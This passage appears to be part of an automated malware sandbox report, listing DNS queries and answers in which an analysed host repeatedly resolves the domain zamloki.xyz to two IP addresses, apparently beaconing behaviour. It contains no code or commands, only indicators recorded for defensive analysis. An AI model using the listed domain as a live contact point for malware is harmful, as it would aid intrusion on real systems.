                                      Jul 15, 2021 12:44:23.678610086 CEST192.168.2.38.8.8.80x36daStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:24.211297989 CEST192.168.2.38.8.8.80xc2d3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:24.743802071 CEST192.168.2.38.8.8.80xaab3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:25.247539997 CEST192.168.2.38.8.8.80x6618Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:25.740283966 CEST192.168.2.38.8.8.80xcaffStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:26.315442085 CEST192.168.2.38.8.8.80x272dStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:26.862411022 CEST192.168.2.38.8.8.80xf5e5Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:27.410389900 CEST192.168.2.38.8.8.80x6749Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:27.985253096 CEST192.168.2.38.8.8.80x5269Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:28.535154104 CEST192.168.2.38.8.8.80xb0d1Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:29.364028931 CEST192.168.2.38.8.8.80x9704Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:29.928497076 CEST192.168.2.38.8.8.80xeadfStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:30.769480944 CEST192.168.2.38.8.8.80x728cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:31.275645971 CEST192.168.2.38.8.8.80x8536Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:31.790925026 CEST192.168.2.38.8.8.80xad7eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:32.329803944 CEST192.168.2.38.8.8.80xf57eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:32.874526024 CEST192.168.2.38.8.8.80xdee3Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:33.400223017 CEST192.168.2.38.8.8.80x1c00Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:33.914679050 CEST192.168.2.38.8.8.80x3614Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:34.422029018 CEST192.168.2.38.8.8.80x1231Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:34.950021029 CEST192.168.2.38.8.8.80xb574Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:35.469222069 CEST192.168.2.38.8.8.80x88feStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:36.071940899 CEST192.168.2.38.8.8.80x40a2Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:36.586363077 CEST192.168.2.38.8.8.80x3f1dStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:37.102833986 CEST192.168.2.38.8.8.80x1ec5Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:37.754165888 CEST192.168.2.38.8.8.80xeaaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:38.274534941 CEST192.168.2.38.8.8.80xcb95Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:38.803870916 CEST192.168.2.38.8.8.80x35e5Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:39.364772081 CEST192.168.2.38.8.8.80xb7abStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:40.175919056 CEST192.168.2.38.8.8.80x339Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:40.810349941 CEST192.168.2.38.8.8.80x403fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:41.883888960 CEST192.168.2.38.8.8.80xdcaaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:43.161122084 CEST192.168.2.38.8.8.80xf2faStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:43.704900980 CEST192.168.2.38.8.8.80xf3ccStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:44.203610897 CEST192.168.2.38.8.8.80x2defStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:44.701412916 CEST192.168.2.38.8.8.80xf429Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:45.219660044 CEST192.168.2.38.8.8.80x4e8fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:45.751689911 CEST192.168.2.38.8.8.80x2281Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:46.267385006 CEST192.168.2.38.8.8.80xb936Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:46.767110109 CEST192.168.2.38.8.8.80x6675Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:47.285147905 CEST192.168.2.38.8.8.80xe4d9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:47.839428902 CEST192.168.2.38.8.8.80xaf41Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:48.374926090 CEST192.168.2.38.8.8.80x627fStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:48.876656055 CEST192.168.2.38.8.8.80xe1ddStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:49.410851002 CEST192.168.2.38.8.8.80x5257Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:49.904887915 CEST192.168.2.38.8.8.80xf89Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:50.419938087 CEST192.168.2.38.8.8.80x184Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:50.957070112 CEST192.168.2.38.8.8.80x32aaStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:51.492249966 CEST192.168.2.38.8.8.80x88beStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:52.000727892 CEST192.168.2.38.8.8.80x1429Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:52.541213989 CEST192.168.2.38.8.8.80x6d1aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:53.039995909 CEST192.168.2.38.8.8.80xe52aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:53.573863029 CEST192.168.2.38.8.8.80xdca6Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:54.081576109 CEST192.168.2.38.8.8.80x1ef7Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:54.660336018 CEST192.168.2.38.8.8.80x53c9Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:55.156505108 CEST192.168.2.38.8.8.80xf973Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:55.671787977 CEST192.168.2.38.8.8.80x141cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:56.172998905 CEST192.168.2.38.8.8.80x18c0Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:56.679073095 CEST192.168.2.38.8.8.80x392aStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:57.171515942 CEST192.168.2.38.8.8.80xde0bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:57.691869020 CEST192.168.2.38.8.8.80xc651Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:58.227463007 CEST192.168.2.38.8.8.80x131bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:58.762233973 CEST192.168.2.38.8.8.80x7020Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:59.274435997 CEST192.168.2.38.8.8.80xbe25Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:59.773226976 CEST192.168.2.38.8.8.80xaf5cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:00.275674105 CEST192.168.2.38.8.8.80x2487Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:00.799334049 CEST192.168.2.38.8.8.80xe10bStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:01.333152056 CEST192.168.2.38.8.8.80x817Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:01.941364050 CEST192.168.2.38.8.8.80x9d12Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:02.723032951 CEST192.168.2.38.8.8.80x651cStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:03.674669027 CEST192.168.2.38.8.8.80xa92dStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:04.364547968 CEST192.168.2.38.8.8.80xce58Standard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:04.892307997 CEST192.168.2.38.8.8.80x80caStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:05.424576998 CEST192.168.2.38.8.8.80x6dfStandard query (0)zamloki.xyzA (IP address)IN (0x0001)
                                      Jul 15, 2021 12:45:05.996809006 CEST192.168.2.38.8.8.80x2b0eStandard query (0)zamloki.xyzA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Jul 15, 2021 12:43:47.855693102 CEST8.8.8.8192.168.2.30x28bcNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:47.855693102 CEST8.8.8.8192.168.2.30x28bcNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:48.415952921 CEST8.8.8.8192.168.2.30x2f99No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:48.415952921 CEST8.8.8.8192.168.2.30x2f99No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:48.846921921 CEST8.8.8.8192.168.2.30xcd55No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:48.846921921 CEST8.8.8.8192.168.2.30xcd55No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:49.465328932 CEST8.8.8.8192.168.2.30x9415No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:49.465328932 CEST8.8.8.8192.168.2.30x9415No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:50.106607914 CEST8.8.8.8192.168.2.30xd5f1No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:50.106607914 CEST8.8.8.8192.168.2.30xd5f1No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:50.925728083 CEST8.8.8.8192.168.2.30x8a87No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:50.925728083 CEST8.8.8.8192.168.2.30x8a87No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:51.506958961 CEST8.8.8.8192.168.2.30xb07bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:51.506958961 CEST8.8.8.8192.168.2.30xb07bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:52.631071091 CEST8.8.8.8192.168.2.30x98cdNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:52.631071091 CEST8.8.8.8192.168.2.30x98cdNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:54.160015106 CEST8.8.8.8192.168.2.30x6ba6No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:54.160015106 CEST8.8.8.8192.168.2.30x6ba6No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:54.743144035 CEST8.8.8.8192.168.2.30xf859No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:54.743144035 CEST8.8.8.8192.168.2.30xf859No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:55.255378008 CEST8.8.8.8192.168.2.30x2c03No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:55.255378008 CEST8.8.8.8192.168.2.30x2c03No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:55.971553087 CEST8.8.8.8192.168.2.30x3efNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:55.971553087 CEST8.8.8.8192.168.2.30x3efNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:56.530544996 CEST8.8.8.8192.168.2.30x57c7No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:56.530544996 CEST8.8.8.8192.168.2.30x57c7No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:57.108472109 CEST8.8.8.8192.168.2.30xd8c9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:57.108472109 CEST8.8.8.8192.168.2.30xd8c9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:57.695081949 CEST8.8.8.8192.168.2.30xe506No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:57.695081949 CEST8.8.8.8192.168.2.30xe506No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:58.234225988 CEST8.8.8.8192.168.2.30x4b72No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:58.234225988 CEST8.8.8.8192.168.2.30x4b72No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:58.891779900 CEST8.8.8.8192.168.2.30x326bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:58.891779900 CEST8.8.8.8192.168.2.30x326bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:59.418761015 CEST8.8.8.8192.168.2.30xcb51No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:59.418761015 CEST8.8.8.8192.168.2.30xcb51No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:59.984743118 CEST8.8.8.8192.168.2.30x6e9aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:43:59.984743118 CEST8.8.8.8192.168.2.30x6e9aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:00.527525902 CEST8.8.8.8192.168.2.30xa3aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:00.527525902 CEST8.8.8.8192.168.2.30xa3aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:01.055779934 CEST8.8.8.8192.168.2.30x7e2fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:01.055779934 CEST8.8.8.8192.168.2.30x7e2fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:01.668643951 CEST8.8.8.8192.168.2.30xc225No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:01.668643951 CEST8.8.8.8192.168.2.30xc225No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:02.305361986 CEST8.8.8.8192.168.2.30x4b68No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:02.305361986 CEST8.8.8.8192.168.2.30x4b68No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:02.848674059 CEST8.8.8.8192.168.2.30xefdcNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:02.848674059 CEST8.8.8.8192.168.2.30xefdcNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:03.695089102 CEST8.8.8.8192.168.2.30x435cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:03.695089102 CEST8.8.8.8192.168.2.30x435cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:04.232584953 CEST8.8.8.8192.168.2.30xc01fNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:04.232584953 CEST8.8.8.8192.168.2.30xc01fNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:04.768723965 CEST8.8.8.8192.168.2.30x3ec0No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:04.768723965 CEST8.8.8.8192.168.2.30x3ec0No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:05.412250042 CEST8.8.8.8192.168.2.30x64f2No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:05.412250042 CEST8.8.8.8192.168.2.30x64f2No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:05.994390011 CEST8.8.8.8192.168.2.30x9ba4No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:05.994390011 CEST8.8.8.8192.168.2.30x9ba4No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:06.525233984 CEST8.8.8.8192.168.2.30x730eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:06.525233984 CEST8.8.8.8192.168.2.30x730eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:07.156969070 CEST8.8.8.8192.168.2.30xae90No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:07.156969070 CEST8.8.8.8192.168.2.30xae90No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:07.701777935 CEST8.8.8.8192.168.2.30xdd1aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:07.701777935 CEST8.8.8.8192.168.2.30xdd1aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:08.265764952 CEST8.8.8.8192.168.2.30x1fe4No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:08.265764952 CEST8.8.8.8192.168.2.30x1fe4No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:08.804574013 CEST8.8.8.8192.168.2.30x2ac9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:08.804574013 CEST8.8.8.8192.168.2.30x2ac9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:09.356261969 CEST8.8.8.8192.168.2.30x278bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:09.356261969 CEST8.8.8.8192.168.2.30x278bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:09.898235083 CEST8.8.8.8192.168.2.30x2027No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:09.898235083 CEST8.8.8.8192.168.2.30x2027No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:10.441601038 CEST8.8.8.8192.168.2.30xcca9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:10.441601038 CEST8.8.8.8192.168.2.30xcca9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:11.049803972 CEST8.8.8.8192.168.2.30xb098No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:11.049803972 CEST8.8.8.8192.168.2.30xb098No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:11.572421074 CEST8.8.8.8192.168.2.30xa00dNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:11.572421074 CEST8.8.8.8192.168.2.30xa00dNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:12.281625032 CEST8.8.8.8192.168.2.30x6376No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:12.281625032 CEST8.8.8.8192.168.2.30x6376No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:12.842216015 CEST8.8.8.8192.168.2.30x5bbNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:12.842216015 CEST8.8.8.8192.168.2.30x5bbNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:13.395761013 CEST8.8.8.8192.168.2.30x2e5eNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:13.395761013 CEST8.8.8.8192.168.2.30x2e5eNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:14.010463953 CEST8.8.8.8192.168.2.30xffe9No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:14.010463953 CEST8.8.8.8192.168.2.30xffe9No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:14.642564058 CEST8.8.8.8192.168.2.30xeffeNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:14.642564058 CEST8.8.8.8192.168.2.30xeffeNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:15.149255037 CEST8.8.8.8192.168.2.30x2af0No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:15.149255037 CEST8.8.8.8192.168.2.30x2af0No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:15.642895937 CEST8.8.8.8192.168.2.30x6caaNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:15.642895937 CEST8.8.8.8192.168.2.30x6caaNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:16.168962002 CEST8.8.8.8192.168.2.30x2020No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:16.168962002 CEST8.8.8.8192.168.2.30x2020No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:16.687606096 CEST8.8.8.8192.168.2.30x243aNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:16.687606096 CEST8.8.8.8192.168.2.30x243aNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:17.376025915 CEST8.8.8.8192.168.2.30x238bNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:17.376025915 CEST8.8.8.8192.168.2.30x238bNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:17.891642094 CEST8.8.8.8192.168.2.30x54aeNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:17.891642094 CEST8.8.8.8192.168.2.30x54aeNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:18.385477066 CEST8.8.8.8192.168.2.30xaa59No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:18.385477066 CEST8.8.8.8192.168.2.30xaa59No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:18.903363943 CEST8.8.8.8192.168.2.30xe892No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:18.903363943 CEST8.8.8.8192.168.2.30xe892No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:19.467612982 CEST8.8.8.8192.168.2.30xecf4No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:19.467612982 CEST8.8.8.8192.168.2.30xecf4No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:19.979599953 CEST8.8.8.8192.168.2.30x9d95No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:19.979599953 CEST8.8.8.8192.168.2.30x9d95No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:20.483789921 CEST8.8.8.8192.168.2.30x663cNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:20.483789921 CEST8.8.8.8192.168.2.30x663cNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:21.036919117 CEST8.8.8.8192.168.2.30xe54No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:21.036919117 CEST8.8.8.8192.168.2.30xe54No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:21.623914003 CEST8.8.8.8192.168.2.30x2524No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:21.623914003 CEST8.8.8.8192.168.2.30x2524No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:22.154730082 CEST8.8.8.8192.168.2.30xbbffNo error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:22.154730082 CEST8.8.8.8192.168.2.30xbbffNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:22.655612946 CEST8.8.8.8192.168.2.30xc82No error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:22.655612946 CEST8.8.8.8192.168.2.30xc82No error (0)zamloki.xyz104.21.6.222A (IP address)IN (0x0001)
                                      Jul 15, 2021 12:44:23.161600113 CEST8.8.8.8192.168.2.30x62ebNo error (0)zamloki.xyz172.67.155.45A (IP address)IN (0x0001)
